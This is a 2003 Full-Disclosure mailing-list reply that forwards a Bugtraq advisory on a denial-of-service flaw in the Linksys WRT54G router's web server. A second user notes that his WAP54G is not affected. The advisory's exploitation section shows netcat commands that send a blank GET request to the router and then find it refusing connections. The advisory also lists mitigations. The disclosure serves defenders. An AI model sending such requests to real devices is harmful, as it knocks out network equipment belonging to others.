[Full-Disclosure] [Fwd: Bugtraq: Linksys WRT54G Denial of Service Vulnerability]

kang at insecure.ws kang at insecure.ws
Thu Dec 4 12:12:06 GMT 2003


Despite being very similar, my WAP54G *isn't* vulnerable :)
(Firmware: v1.08, Aug 05, 2003)

Michael Renzmann wrote:

> Can anyone confirm if technically identical devices such as the 
> Buffalo WBR-G54 share this vulnerability?
>
> -------- Original Message --------
> Subject: Linksys WRT54G Denial of Service Vulnerability
> Date: 3 Dec 2003 22:35:26 -0000
> From: <test at techcentric.net>
> To: bugtraq at securityfocus.com
>
> Linksys WRT54G Denial of Service Vulnerability
>
> System(s)
> ===========
>
> Tested on Linksys WRT54G v1.0 (firmware v 1.42.3)
>
> Detail(s)
> ===========
>
> Sending a blank GET request to the router on port 80 (or 8080) halts 
> the embedded webserver.  This may allow an attacker to force the owner 
> to reboot the router, allowing them to gain sensitive information 
> during router authentication.
>
> Exploitation
> ============
>
> user at test:~$ nc 10.0.0.1 80
>
> GET
>
> user at test:~$ nc 10.0.0.1 80
>
> (UNKNOWN) [10.0.0.1] 80 (http) : Connection refused
>
> user at test:~$
>
> Solution(s)
> ============
>
> - HTTPS service should continue running for remote access.
> - Scan for sniffers that might be on the network before rebooting and 
> performing any authentication.
> - Wait for a vendor patch :)
>
> Status
> ============
>
> Vendor contacted on 12/03/03.
>
> !HAPPY HOLIDAYS!
>
> carbon at techcentric.net - 12/02/03
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html





